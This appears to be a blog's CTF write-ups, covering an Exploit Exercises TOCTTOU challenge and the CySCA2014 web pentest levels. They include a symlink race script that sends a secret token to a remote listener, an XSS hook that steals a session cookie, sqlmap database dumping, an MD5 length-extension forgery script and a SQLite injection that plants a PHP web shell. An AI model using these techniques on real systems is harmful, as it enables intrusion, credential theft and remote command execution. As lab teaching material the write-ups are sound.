There is also a ‘token’ file located in the flag10 home directory, but the ‘level10’ user doesn’t have read access to this file. It seems the challenge is to somehow exploit the program to provide us with access to the token file.

Inspection of the source code shows that it might be vulnerable to a "TOCTTOU" attack, which stands for "Time Of Check To Time Of Use". Basically, this vulnerability exists when a program first checks a condition and then uses the result of that check at a later time. In the source code for this challenge, the program checks whether the user has access to the file at line 24, and it opens the file for reading at line 54. A TOCTTOU attack means providing the program a file that the user has access to, so that the check at line 24 returns "true", and then swapping that file out for one the user doesn't have access to (the token file) before line 54 executes.

There are a couple of preparatory steps that need to be taken before attempting to exploit the program. First of all, a script needs to be run that continuously swaps out a file that we have access to with the token file. The easiest way to accomplish this is to create a symbolic link to a file and to have the script change the target of the symbolic link back and forth. The commands for this are:

echo "testing token" > faketoken                 # create fake token file

ln -sf /home/level10/faketoken file              # create symbolic link named 'file', pointing at the fake token

vi tocttouscript.sh                              # create the TOCTTOU script below

#!/bin/bash

COUNT=1                                          # create counter

while true                                       # run forever

do

    echo $COUNT                                  # I like to echo counters on each run to make sure it's running

    ln -sf /home/flag10/token file               # switch the symbolic link target to the real token

    ln -sf /home/level10/faketoken file          # switch it back to the fake token

    COUNT=$((COUNT+1))                           # increase counter by one

done

So now we have the symbolic link and the shell script responsible for constantly changing out the target. We also need to set up a host to listen on port 18211 for the incoming file. I simply opened up a port with netcat on my remote system. The command for this is:

ncat -l 18211 --keep-open

The '--keep-open' flag is important here because without it, the connection gets closed as soon as input is received. The TOCTTOU attack is somewhat of a trial-and-error attack – the swapping of the files has to happen at exactly the right moment (between the moment the access permissions are checked and the moment the result of the check is used), and this is unlikely to happen on the first attempt. Numerous repeated attempts will be made until the timing lines up, so we want to make sure our host and port keep listening until that happens.

Now everything is in place to start the attack. The first thing to do is to start the script we wrote to start the swapping of the files that the symbolic link points to.

./tocttouscript.sh

Next we want to execute the ‘flag’ program, but we don’t want to execute it just once. We want to execute it multiple times in a row because again – this exploit is somewhat of a trial and error process. To accomplish this we could write a second script and execute that, or we can simply execute a while-loop from the command line, where ‘<host>’ gets replaced with the IP address for your listening server:

while true; do /home/flag10/flag10 /home/level10/file <host>; done

Below is some of the information that I received on my open netcat connection:

root@kali:~# ncat -l 18211 --keep-open
.oO Oo.
testing token
.oO Oo.
testing token
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
testing token

As you can tell, the first two runs of the program did not coincide with the files being swapped at the right moment, but the next two runs did. The contents of the 'token' file appear to be "615a2ce1-b2b5-4c76-8eed-8aa5c4015c27". Establishing another ssh connection from Kali to the Exploit Exercises box and authenticating with username "flag10" and the token as the password results in a successful login. We can now execute the 'getflag' command and complete this challenge.

 

That is as far as I’ve gotten so far with Exploit Exercises. As I complete more challenges, I’ll add more entries to this blog post.


CySCA2014 Web Application Pentest

CySCA2014 Write-Up

CySCA2014 is an Australian cybersecurity challenge that occurred over 24 hours on May 7th, 2014. Afterwards, the challenges were made available for download for anyone interested in attempting them. The link to download CySCA2014 is https://cyberchallenge.com.au/inabox.html. The challenges included web penetration testing, Android forensics, reverse engineering, cryptography, and more. Together with two friends I attempted to solve these challenges and what follows is a write-up of our process. We are only just getting started on CySCA2014 so as we solve more challenges, more blog posts will be added.

Web Application Pentest

Club Status

Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

CySCA2014 includes a website for a fictional company called Fortress Certifications. The website has several sections: ‘services’, ‘about’, ‘contact’, ‘blog’, and ‘sign in’. The ‘blog’ section of the website is grayed out and as the challenge description indicates, the user has to become ‘VIP’ to gain access to this section of the website.

1

Solving this challenge was fairly straightforward. After firing up Burpsuite and setting the web browser to use it as a proxy, it quickly became clear that the website uses a cookie on the client machine with a 'vip' parameter to determine whether a user is a VIP. Intercepting a request from the client to the server and changing the value from 'vip=0' to 'vip=1' granted access to the 'blog' section of the website and revealed the flag there.

2

3

4

For anyone new to Burpsuite, here’s some information that will make your life a little easier. You can add ‘match and replace’ rules using ‘Proxy’ -> ‘Options’ to automatically change the cookie value from ‘vip=0’ to ‘vip=1’ in the future, so you don’t have to manually change it on each request. Even if you turn intercept off, the request will still be changed. As long as the rule is marked ‘enabled’ you will remain vip.

5

Om nom nom nom

Gain access to the Blog as a registered user to reveal the hidden flag.

Although we now have access to the blog, we are still identified as ‘guest’ as can be seen in one of the previous screenshots. This challenge requires us to become authenticated as a registered user. Our first instinct was to bruteforce our way in through the ‘sign in’ section of the site, using a list of usernames that was previously found under ‘contact’.

6

There are various ways in which a login form can be attacked, such as using the ‘intruder’ tool in Burpsuite or using a command line tool such as Hydra. Both of these tools and multiple wordlists were used in an attempt to find a valid combination of username and password, but after several hours of bruteforcing we had to acknowledge that becoming authenticated wouldn’t be as simple as that. In fact, had we taken the time to read the FAQ section of the challenge site we could have saved ourselves a significant amount of time, since it clearly states that bruteforcing passwords is never required.

7

Alright, so another method of becoming authenticated needed to be found. After browsing around the website and the blog for quite some time trying to find another way in, we noticed that a user was active on one of the blog posts: 'Sycamore' had last viewed one of his posts as recently as 37 seconds ago. Clearly an automated job on the Cysca box was refreshing this page regularly while logged in as user Sycamore.

8

The first thing that came to mind was to use a cross site scripting (XSS) attack to steal Sycamore’s session ID. However, after leaving numerous comments with XSS code in various formats it became clear that comments were being filtered for this. So if we can’t inject XSS code into the site, how do we steal Sycamore’s session ID?

One thing that we have really enjoyed during almost all of the CySCA2014 challenges we’ve solved so far is that the solution can often be found in small details. In this case, we finally noticed a note underneath the comments section that said: “Links can be added with [Link title](http://example.com)”. So although we can’t insert XSS code into a comment directly, maybe we can add it to a link reference.

We fired up the ‘Beef-xss’ application and – after some playing around with different formats – submitted the following comment:

[<script src="http://192.168.159.128:3000/hook.js"></script>(www.example.com)pwnt]

When viewing the blog entry, the comment only shows up as "pwnt", but in the background the user's browser actually loads 192.168.159.128:3000/hook.js, which 'hooks' it into beef-xss and allows us to manipulate it in all sorts of ways. In this case, all we really needed was to steal the session ID from Sycamore's cookie and use it in place of our own. After doing so, we were successfully authenticated as 'Sycamore' and the second flag was shown on the screen.

9

 

10

11

12

Remember, like before you can add a ‘match and replace’ rule to Burpsuite to automatically replace your own session ID with Sycamore’s so that you don’t have to manually replace it every time.

Nonce-sense

Retrieve the hidden flag from the database.

This is where things really started to get challenging. The previous challenge gave us some trouble for a while, but the whole time we knew we were at least on the right track. With this one we had some moments where we were ready to give up. Fortunately, we stuck with it and after many hours of banging our heads against the wall we finally gained access into the database. Here’s how we did it.

Right away, seeing how the flag had to be retrieved from a database, we figured SQL injection would be the way to go. However, during the previous challenge we had moments where we couldn’t figure out how to authenticate as Sycamore and in those moments we had already tested most of the parameters in our GET and POST requests for SQL injection – without success. Still, it didn’t take too long for us to find the parameter that could be injected. Now that we were authenticated as Sycamore we were able to delete comments, and the ‘comment_id’ parameter proved vulnerable to SQL injection. We found out by adding a single quote behind the comment_id value and looking at the server response.

13

14

Once we found out that the parameter was vulnerable to SQL injection, we figured we were pretty much done. We couldn’t have been more wrong – this is where the challenge really started. There were several issues we had to overcome before we could go from vulnerability to exploitation.

First of all, the server responses to our SQL injection didn't correspond to any write-ups of SQL attacks we could find. For instance, one of the first things that write-ups tell you to do is figure out how many columns are in the table you're accessing. You can do this by adding a single quote to the parameter value followed by "order by 10;--", which should tell the SQL server to sort the results by column number 10. This will either result in a valid SQL statement, which you can recognize by the command going through (the comment will be deleted), or in an error message such as "unknown column '10' in 'order clause'". The latter indicates that there are fewer than 10 columns in the table, so you narrow it down until the command goes through. However, when we tried the 'order by' SQL injection, we received the following response from the server:

15

The server response indicated that it recognized everything we added after the parameter value as incorrect, including the single quote. In other words, we were not successful in ‘breaking out’ of the SQL statement that we were trying to inject into.

We must have spent hours trying to find the right SQL injection to return valuable server information, without any success. Everything we entered would just return the same error message to us (Later on we’ll see that we weren’t encoding our SQL injection commands correctly). At this point you might ask “why didn’t you just use an automated tool such as SQLmap?” Great question; this brings us to issue number two.

The website's blog section uses CSRF tokens to prevent cross-site request forgery (CSRF). These tokens were also successful in stopping us from running automated SQL injection tools. The reason is that every request issued to the server has to include a valid CSRF token. The server response then includes a new CSRF token, which has to be sent with the next request. A token is only valid once, and only for about 15-30 seconds. We're not sure exactly how long it's valid for, but if we waited too long before issuing a request to the server we would invariably get an "invalid CSRF token" error message.

16

We will spare you all the different ways in which we tried to circumvent this error message; we assume that since you are reading this walkthrough you already tried most if not all of those same tactics and discovered they did not work. The key to success for us was provided through BurpSuite’s ability to run a macro for each incoming request. So basically what we did was tell BurpSuite that every time a server request was intercepted, it had to run a macro that would retrieve the latest CSRF token and to replace the original token with the new one before sending the request on to the server.

Let’s look at that step by step. First, set up the macro that you will use. It needs to be a server request that obtains the new CSRF token, so a simple GET request for a blog page will do just fine. To configure the macro, go to ‘Options -> Sessions -> Macro’ and create a new macro.

17

18

When you ‘record’ the macro, just select a simple GET request for a blog page from your HTTP history. Now here’s the important part – you have to go to ‘configure item’ and select a custom parameter location from the server response. This is where we go to select the CSRF token and use it as a parameter in our next request. BurpSuite offers the awesome functionality of allowing you to just select what you wish to extract, and it will generate the appropriate syntax for you.

19

20

Now that the macro is set up, we need to create a session handling rule under 'Options -> Sessions -> Session Handling Rules'. The rule has to specify, under 'rule actions', to run our macro. You also have to set a scope for the rule by clicking on the 'scope' tab. Here you select only 'proxy' for when the rule will run, and for 'URL scope' you can either select 'include all URLs' or be more specific by selecting 'use suite scope'. The latter requires you to go to 'Target -> Scope' and make sure you have the Cysca box's URL defined as a target.

21

22

23

24

Now Burpsuite is configured to replace the CSRF token of incoming requests (sent using Burpsuite as a proxy) with a new and valid CSRF token. The next step is to configure SQLmap to perform SQL injection into the vulnerable parameter and to use Burpsuite as a proxy. The first thing we want to do is generate a ‘delete comment’ POST request that we can use as a template for SQLmap. Generate a ‘delete comment’ request or select one from your HTTP history (make sure it contains Sycamore’s PHPSESSID value in the cookie) and save it into a text file (we just used Leafpad for this). NOTE: Be careful – certain text file editors (vi) will include extra line feeds when you copy and paste a request from Burp into it. These extra line feeds WILL mess up your requests and provide you with invalid results. We spent several hours trying to troubleshoot our macro when all we had to do to get things to work was remove the extra lines from the template file. No fun!!

Alright, now it's time to fire up SQLmap, tell it to use the text file with the POST request as a template (-r), inform it of which parameter to inject (-p), and point it to BurpSuite as a proxy (--proxy). The command for this is:

sqlmap -r <full path to request file> -p comment_id --proxy=http://127.0.0.1:8080

I would advise doing two things before running this command: (1) enable intercepting in Burpsuite so that you can see the request that SQLmap is sending out to the server, and (2) go to 'Options -> Sessions -> Session Handling Rules' and click 'open sessions tracer'. The sessions tracer shows the original incoming request, the macro that is run, the action taken as a result of running the macro, and the final request that is sent out to the server. You can look at each of these steps and verify that your macro is running correctly and that it is in fact replacing the CSRF token from the template with a new one from the server for each request made. Notice that the SQL injection that is added to the 'comment_id' parameter is HTML encoded. This is why we were previously unable to get information back from the server using manual SQL injection – we weren't encoding our commands properly.

One more tip for this challenge: if you followed all of the steps described here and are still having trouble performing SQL injection into the comment_id parameter, try running SQLmap with a delay on its requests (--delay 1 for a one-second delay). We ran into a situation where our macro was running as intended, and the individual requests in the sessions tracer showed that BurpSuite was inserting a fresh CSRF token into each request before sending it on, but we were still getting ‘invalid CSRF token’ errors in our responses. Again, we must have spent hours troubleshooting this issue when, in the end, a simple one-second delay on our SQLmap requests fixed it. We have also been able to run attacks against the server successfully without the delay, so it doesn’t seem to be strictly required, but it resolved the problem for us when nothing else would, so we include it here in case someone else runs into the same thing.

image25

image26

image27

image28

Now that we can successfully run a SQL injection attack against the server, getting the hidden flag is a piece of cake. First we enumerate all the databases on the server using the ‘--dbs’ flag. This reveals that there are two databases: ‘cysca’ and ‘information_schema’. For this challenge, only the ‘cysca’ database is of interest. Next we enumerate the tables in the cysca database by specifying the database with ‘-D cysca’ and using the ‘--tables’ flag. There are five tables in the ‘cysca’ database: ‘user’, ‘blogs’, ‘comments’, ‘flag’, and ‘rest_api_log’. Finally, we can dump the contents of the ‘flag’ table using the ‘-D cysca’, ‘-T flag’, and ‘--dump’ flags. This reveals that the hidden database flag is “CeramicDrunkSound667”.
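For reference, the full enumeration comes down to three variations of the earlier command (same template file and proxy; only the enumeration flags change):

sqlmap -r <full path to request file> -p comment_id --proxy=http://127.0.0.1:8080 --dbs

sqlmap -r <full path to request file> -p comment_id --proxy=http://127.0.0.1:8080 -D cysca --tables

sqlmap -r <full path to request file> -p comment_id --proxy=http://127.0.0.1:8080 -D cysca -T flag --dump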

image29

image30

image31

Hypertextension

Retrieve the hidden flag by gaining access to the caching control panel.

Our first question upon reading this challenge was “What the fuck is the caching control panel??” We had never heard of this before, despite at least one of us being somewhat familiar with web servers. Google did not help us out much, so we figured we’d just start on the challenge and hope that it would become clearer as we made progress.

We started this challenge by enumerating pretty much everything in the database that we had just compromised. The screenshots below show some of the information that was logged in sqlmap’s ‘log’ file for the server, under /usr/share/sqlmap/output.

image32

image33

The ‘user’ table provided us with information on three registered users, including their password hashes and salts, while the ‘rest_api_log’ table provided GET, POST, and PUT requests that had previously been submitted to the server, including an API key for one user.

Our first attempt at making progress on this challenge was to try to crack the user passwords. Again, this was a waste of time, as bruteforcing is never required according to the Cysca FAQ. However, we reached this point before any of us had looked at the FAQ. Hopefully you did not make the same mistake. Needless to say, running hashcat with multiple wordlists and rules did not result in any cracked passwords.

Next we decided to see if we could attack the site’s REST API. On the website’s blog there is a post by Sycamore that refers to the REST API specification, located at “<cysca>/api/documents/id/3”. Below is a screenshot of the document.

image34

The document describes a couple of things: (1) that any request that modifies content (POST, PUT, and DELETE) needs to be signed with an API signature, (2) how a valid API signature is calculated, (3) what parameters need to be included in GET, POST, and PUT requests, and (4) what a valid, signed POST request looks like. At this point it was pretty clear that we needed to find a way to submit valid POST and/or PUT requests to the server. We didn’t know yet how it would help us locate the flag in the caching control panel, but we knew it would help us get there. So somehow we needed to find a way to create valid API signatures.

The problem is that the calculation of an API signature includes a shared secret. Without the shared secret it is impossible to create a valid API signature – at least at first glance. Our first attempt at creating an API signature… bruteforcing. Seriously – I will never again attempt a CTF challenge without reading the FAQ first.

Our thought process was as follows: we couldn’t crack the password hashes that we found in the database, but we assumed that a user’s password would be the same as their ‘shared secret’ for their API signatures. Since we had obtained a couple of valid API calls, including signatures, from the database, we might be able to uncover the secret by recreating a known API call and using a wordlist to supply the secret. The assumption here is that we were previously unable to crack the passwords because they were salted, but now we might be successful because the salt doesn’t come into play for the API signature.

We created a script that took the string “contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf”, prepended an entry from a wordlist to it (as the secret), created an MD5 hash of the combined string, and then compared this MD5 hash to the one we knew to be valid for the API call. If the wordlist entry was equal to the secret, the two MD5 hashes would be the same. Of course, even after using several different wordlists (and waiting for long periods for the script to finish) we did not find the secret.
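The core of that script boiled down to something like the following Python sketch (the known signature came from the ‘rest_api_log’ table, and the wordlist path is just an example):

import hashlib

# Parameter string from the logged API call, with all '&' and '=' symbols removed
MESSAGE = "contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf"
KNOWN_SIG = "<signature from the rest_api_log table>"  # placeholder

def find_secret(wordlist_path):
    with open(wordlist_path, "r", errors="ignore") as wordlist:
        for line in wordlist:
            candidate = line.strip()
            # The API signature is the MD5 of (secret + parameter string)
            if hashlib.md5((candidate + MESSAGE).encode()).hexdigest() == KNOWN_SIG:
                return candidate
    return None

print(find_secret("/usr/share/wordlists/rockyou.txt"))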

So now we were somewhat at a loss: if we don’t know the secret we can’t create valid API signatures, and if we can’t create these signatures then we can’t make valid API calls. We did what you should always do when you are at a loss for answers: we turned to Google. After a couple of different queries, one of us stumbled on something called a ‘length extension attack’. A length extension attack can be used to calculate a valid hash for (secret + message + additional data) when you have the hash of (secret + message) and you know both the message and the length of the secret, even if you don’t know the secret itself. This sounded almost exactly like what we were faced with, although we didn’t know the length of our secret.

Length extension attacks work due to a weakness in how numerous hashing algorithms, including MD5, calculate a hash value. MD5 processes input in blocks of a fixed length (512 bits). The value of (secret + message) is padded with a ‘1’ bit and a number of ‘0’ bits, followed by the length of the string in bits (the string being secret + message), encoded as a 64-bit little-endian value. So while the hexadecimal value of (secret + message) might be “73 65 63 72 65 74 64 61 74 61” (secretdata), the MD5 algorithm will add padding and a length indicator to it before hashing, so that it looks like this:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00”
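You can reproduce that padded block yourself. Here is a short Python sketch that builds MD5’s padding for an arbitrary message (MD5 appends a 0x80 byte, zero bytes until the length is 56 mod 64, and then the original length in bits as a 64-bit little-endian integer):

import struct

def md5_pad(message: bytes) -> bytes:
    # Append the mandatory 0x80 byte (the '1' bit), then zeros up to 56 mod 64
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    # Append the original length in bits as a 64-bit little-endian integer
    padded += struct.pack("<Q", len(message) * 8)
    return padded

# "secretdata" is 10 bytes = 80 bits = 0x50, matching the block above
print(md5_pad(b"secretdata").hex(" "))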

So how can this be exploited? Well, the specifics get a little complicated here, so we’ll refer you to two excellent sources on the details of length extension attacks: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks and https://blog.whitehatsec.com/hash-length-extension-attacks/.

Although we can’t say we completely understand the specifics of length extension attacks, we’ll try to put our understanding of what is explained in the two sources above into words, in the hope we don’t fuck it up too much. Basically, you can append information to the string that is included in the calculation of the hash. For instance, instead of hashing “secretdata” we might want to calculate the hash of “secretdatamoredata”. The length extension attack will not work if you simply add stuff to the end of the original message. However, it WILL work if you include the padding first and then append the additional information after it. Adding the hex value “6d 6f 72 65 64 61 74 61” (moredata) to the end gives us:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 6d 6f 72 65 64 61 74 61”

The MD5 hashing algorithm will first calculate the hash for the first 512-bit block (which results in the hash that we already know) and will use that value as the starting point for the calculation over the added data. Since we know the original hash, we can add information to the message without ever knowing the secret and still calculate a valid hash value! However, we do need to know the length of the secret, because otherwise we would not know how much padding to add to fill out the 512-bit block. So let’s move on from the theory and look specifically at how we implemented the length extension attack.

As mentioned previously, we understood the gist of the length extension attack, but we didn’t know enough about hashing algorithms or cryptography to execute this attack from scratch ourselves. Fortunately there are people smarter than us around who wrote tools that make such an attack a lot easier. Two such tools are ‘HashPump’ and ‘hash_extender’, both of which can be downloaded from GitHub. We ended up using HashPump, so I will use that in my write-up of the challenge, but hash_extender offers the same functionality and both are very easy to use.

HashPump requires the following arguments: (1) the original message, (2) the original hash, (3) the message/data to add, and (4) the length of the original secret. We had three out of these four – we did not know the length of the secret. To overcome this obstacle we wrote a script with a loop that plugged in the three values we did know and incremented the value for ‘length of the original secret’ by one on each iteration. At the end of each iteration it would submit a POST request to the server, formatted according to the description in the rest-api-v2.txt document, and display the resulting server response. Please note that we didn’t get all the syntax and formatting in this script correct right away. Like everything else during Cysca2014, it took us several hours to write a script that did exactly what we wanted. For instance, figuring out that the padding provided by HashPump needed to be converted from ‘\x00’ to ‘%00’ before the server would accept the request took a very long time by itself. But eventually we were rewarded for our efforts with a server response that said “error: file path does not exist”. We now knew that the length of the secret was 16 characters.
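Our script drove HashPump’s command-line tool, but the same loop is easy to express with the hashpumpy Python binding. A rough sketch (the original signature and parameter string come from the ‘rest_api_log’ table; the appended data here is just an example, and the request-building step is omitted):

import hashpumpy

ORIG_SIG = "<signature from the rest_api_log table>"   # placeholder
ORIG_PARAMS = "contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf"
APPEND = "filepathindex.php"   # example appended data, with '&' and '=' stripped

for key_len in range(1, 33):
    # hashpumpy returns (forged signature, original data + glue padding + appended data)
    sig, msg = hashpumpy.hashpump(ORIG_SIG, ORIG_PARAMS, APPEND, key_len)
    print(key_len, sig, msg)
    # Each (sig, msg) pair then gets packed into a POST request formatted per
    # rest-api-v2.txt (remember: '\x00' bytes in the padding must be sent as '%00');
    # the secret's length is whichever guess stops producing an invalid-signature error.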

image35

image36

So now we have all the information we need to create valid API signatures, right? Yes and no. Yes, we can create a valid signature for certain types of modified requests, but what can we actually do now? We can’t modify the original request (at least, at this point we didn’t think we could) because the length extension attack depends on the original message and hash to calculate a new hash for the appended data. So all we can do is add something to the end. We tried traversing up directories (appending ‘/../../../../var/www/index.php’) and even pointing to files that we knew existed (appending ‘/../rest-api-v2.txt’), but no matter what we added, we always received the “error: file path does not exist” message. Clearly we were still missing something.

After more experimentation and Googling, we finally came across some helpful information. Ironically, it was found on the GitHub page (https://github.com/bwall/HashPump) for the tool we had been using all along – HashPump – driving home once again the importance of attention to detail and of carefully going through documentation. In their example of a length extension attack, the information appended to the original request is a parameter that has already been assigned a value. The idea is that a parameter takes the value that was assigned to it last, so by re-assigning a value to the parameter you can effectively overwrite the original value without having to modify the original request. The screenshot below shows what that looks like in HashPump: we give the ‘filepath’ parameter a new value. However, the server did not accept our new API signature as valid.

image37

We had already seen that our method of calculating new API signatures with a length extension attack was correct, so we had to be doing something else wrong. As it turns out, we were doing two things wrong. First, we weren’t feeding the new value for filepath to HashPump in the correct form. Remember, the REST API documentation specifies that all ‘&’ and ‘=’ symbols must be removed from the parameter list when calculating the API signature. Although we were doing this in HashPump for the original message, we completely forgot to do it for the appended information. So the server would calculate the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdffilepath/../../../../var/www/index.php”.

Meanwhile HashPump was calculating the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf&filepath=/../../../../var/www/index.php”.

Clearly, these strings lead to different API signatures. However, even after correcting this mistake the server would still not accept our API signature. Apparently the server was processing the request differently than we expected. Maybe it was not simply overwriting the parameter with the last assigned value, or maybe it was overwriting it before calculating the API signature. In either case, the resulting API signature would be different from the one we calculated using HashPump.

image38

Again we returned to Google for ideas on what to do next, and this time we stumbled on one of the most famous examples of a length extension attack: The exploitation of Flickr’s REST API in 2009. A write-up of this attack can be found here: http://netifera.com/research/flickr_api_signature_forgery.pdf.

We noticed two things while reading this write-up: (1) the scenario provided in this Cysca challenge is identical to the vulnerability in Flickr’s REST API, down to the description of the API itself, and (2) we had completely missed a vulnerability in how the API signature is calculated. What we failed to pick up on initially is that, because of the way an API signature is calculated, the signature for “filepath=./example.pdf” is equivalent to the signature for “f=ilepath./example.pdf”. The reason is that the ‘&’ and ‘=’ symbols are removed from the string before the signature is calculated, so in both cases the resulting string over which the signature is computed is “filepath./example.pdf”. This is the crucial factor that allowed us to generate valid API signatures while modifying the original request.
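A quick way to convince yourself of this property, using a made-up secret for illustration:

import hashlib

def api_sig(secret: str, params: str) -> str:
    # Per the spec, '&' and '=' are stripped before the MD5 is computed
    stripped = params.replace("&", "").replace("=", "")
    return hashlib.md5((secret + stripped).encode()).hexdigest()

secret = "sixteenbytekey!!"                          # made-up 16-character secret
print(api_sig(secret, "filepath=./example.pdf"))     # these two lines print
print(api_sig(secret, "f=ilepath./example.pdf"))     # the exact same hash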

We ended up using this information by assigning almost everything in the original message to a parameter named simply ‘c’ (the first letter of the original message), which the server ignores since ‘c’ is not a parameter it recognizes. We then used HashPump to append the original parameter names to the request and generate a valid signature. The following screenshots show what that looks like, on the command line as well as in the request that was issued to the server.

image39

image40

Finally! We were able to modify the values for the parameters that get submitted to the server while still being able to use the original message to perform a length extension attack and generate a valid API signature!

Now all we have to do is find the path to an existing file on the server. We know that the file ‘index.php’ exists, since it is included in the URL that reaches the Fortress Certifications front page. Apparently it is not located at ‘/var/www/index.php’, where it would commonly reside. Instead, it is located in the same directory as the ‘documents’ folder. We found this out after trying a couple of requests with different file paths, until we received the message below.

image41

This message indicates that the REST API created a new link to a document – ‘index.php’. The link is located at http://192.168.198.128/api/documents/id/14. Note that the IP address of the host has changed from before (it used to be 192.168.159.129), but this is due to changes in our virtual network settings and not the request to the REST API.

Navigating to this URL gives us a download prompt, and opening the downloaded file provides more information about other files worth looking at: ‘cache.php’ and ‘caching.php’.

image42

We can repeat the same process to create links to these files through the REST API as well. After doing so and opening ‘cache.php’, we found the flag that marks the completion of this challenge: “OrganicPamperSenator877”.

image43

Injeption

Reveal the final flag, which is hidden in the /flag.txt file on the web server.

The ‘index.php’ and ‘cache.php’ files tell us how to get to the caching control panel: generate an MD5 hash of “OrganicPamperSenator877” and append it to ‘http://<host>/cache.php?access=’.
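The hash itself is a one-liner; for example, in Python:

import hashlib

# MD5 of the previous flag becomes the access token for the caching control panel
print(hashlib.md5(b"OrganicPamperSenator877").hexdigest())

Appending the resulting hash to the URL brings us to the page below.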

image44

The caching control panel enables the caching of certain pages. We can enter a title and a URL for a page, and it will be stored as a cached page in the backend database. Exactly how this works can be learned by investigating the source code of ‘cache.php’ and ‘caching.php’. These files contain the functions and logic that work behind the scenes when a request is submitted through this page, and thoroughly investigating the source code can reveal flaws or vulnerabilities in the caching process.

Through code investigation and some experimentation we were able to determine that the ‘Title’ field is vulnerable to code injection. After a query is submitted, the function that inputs the data into the database is ‘setCache’, which takes the parameters ‘key’, ‘title’, ‘uri’, and ‘data’. Additionally, it uses the database function datetime() to insert the date and time at which the query was submitted. The function can be seen below. The ‘title’ and ‘uri’ values come from what we enter into the caching control panel, the ‘key’ is an MD5 hash of the server name plus the requested URI, and ‘data’ is the contents of the page that was entered into the ‘URI’ field.

image45

It’s possible to break out of this function by using single quotation marks and entering self-chosen values for the parameters that the function expects. The result of doing so can be seen below.

image46

image47

Even though we get a syntax error, generated by the leftover code behind our injection, the function executes just fine and our self-chosen values are entered into the database. Additionally, by using another SQLite function – random() – in our injection, we determined that we can successfully execute SQLite functions other than datetime(). We knew the backend database was SQLite because this was specified in the source code of ‘caching.php’.

This is where we got stuck on this challenge. It seemed clear that we had to use code injection and database functions to get to the ‘/flag.txt’ file on the server, but two constraining factors make this challenge extremely difficult: (1) there is a 40-character limit on the ‘Title’ field in the caching control panel, which makes it almost impossible to inject anything useful, and (2) while there is no character limit on the ‘URI’ field, anything entered into it gets parsed and validated by functions in ‘caching.php’, which makes it seemingly impossible to inject anything through that field.

We spent many hours experimenting with different types of injections and different strategies. We found a page online that explains how to exploit a SQLite database through the use of the ‘ATTACH DATABASE’ command: http://atta.cked.me/home/sqlite3injectioncheatsheet. However, it seemed like this strategy would not work for us due to the limit on how many characters we could enter. Eventually we decided that this challenge was beyond us and looked at the walkthrough posted on the CySCA2014 website: https://cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf.

Since we didn’t solve this challenge ourselves, I won’t claim the solution as ours; I recommend following the link above for the official walkthrough of the problem. After reading the solution, we were glad we hadn’t spent even more time on it, because the walkthrough blew our minds. There was no way we could have figured this out for ourselves. We were on the right path, but the steps needed to get around the character limit were ridiculous. For the remainder of this write-up I will focus on explaining the steps in the CySCA solution, since their walkthrough doesn’t provide much clarification on how to get to ‘/flag.txt’. Even after following their steps it took us some time and reasoning to figure out why they worked.

The walkthrough describes that the goal is to inject the following 122-character string into the database:

',0); ATTACH DATABASE 'a.php' AS a; CREATE TABLE a.b (c text); INSERT INTO a.b VALUES ('<? system($_GET[''cmd'']); ?>');/*

The way this is accomplished is by breaking the string up into smaller sections and piecing them back together at a later point. Note that the single quotes in the strings below are doubled, so that the first INSERT stores titles containing literal single quotes. The four strings that are individually injected are:

  1. '',0);ATTACH DATABASE ''a.php'' AS a;/*
  2. */CREATE TABLE a.b (c text);INSERT /*
  3. */INTO a.b VALUES(''<? system($''||/*
  4. */''_GET[''''cmd'''']); ?>'');/*

Each string starts with the closing of a block comment (*/) and ends with the start of a block comment (/*), except for the first string, which doesn’t start with one. This ensures that any code that might end up between these strings is commented out, and it is what allows these individual database entries to be pieced back together into a single injection string. After performing the code injection, the caching control page looks as below:

image48

You’ll notice that the third entry looks incomplete. However, investigating the source code of the page reveals that the injected code is all there; it’s just being interpreted differently by your browser.

image49

So what is this supposed to do once pieced back together? The ‘ATTACH DATABASE’ command will attach a database file to SQLite, but if the file doesn’t exist, it will be created. Effectively, this command therefore creates a file called ‘a.php’. The rest of the commands create a table (a.b) in the newly created database, with a single text column named ‘c’, and insert one row into it: the value '<? system($' || '_GET[''cmd'']); ?>', which SQLite’s || operator concatenates into <? system($_GET['cmd']); ?>. This code will end up inside the database file ‘a.php’, and ‘a.php’ should then be accessible as a web page, where it will attempt to execute a given system command. So effectively the injected code provides us with a shell on the system through a web page.

The way these four lines of code are pieced back together is by caching the ‘cache.php’ page itself. It took us a while to reason out how caching the caching page would execute this code, but it works because of the first line of injection code. You’ll notice that it starts with ',0);. Thinking back to the ‘setCache’ function in the ‘caching.php’ source code, you’ll remember that its INSERT supplies several values, one of which is ‘$data’, and that ‘data’ contains the source code of whatever page is being cached. By starting the first line of injection code with ',0); we’re effectively breaking out of the ‘data’ value and executing the code that comes after it – the code that attaches the database.

So when we cache the ‘cache.php’ page, the setCache() function takes the source code of the page being cached – ‘cache.php’ – which now includes our four stored titles. It encounters the first line of injection code, which breaks out of the ‘data’ value, and executes the code that follows until it reaches the block comment marker (/*). It then ignores everything until the closing marker (*/) at the beginning of the next line of injection code. This continues until all four lines of injection code have been pieced together and executed, causing ‘a.php’ to be created with the code that allows us to execute commands on the system. The screenshots below show this process.

image50

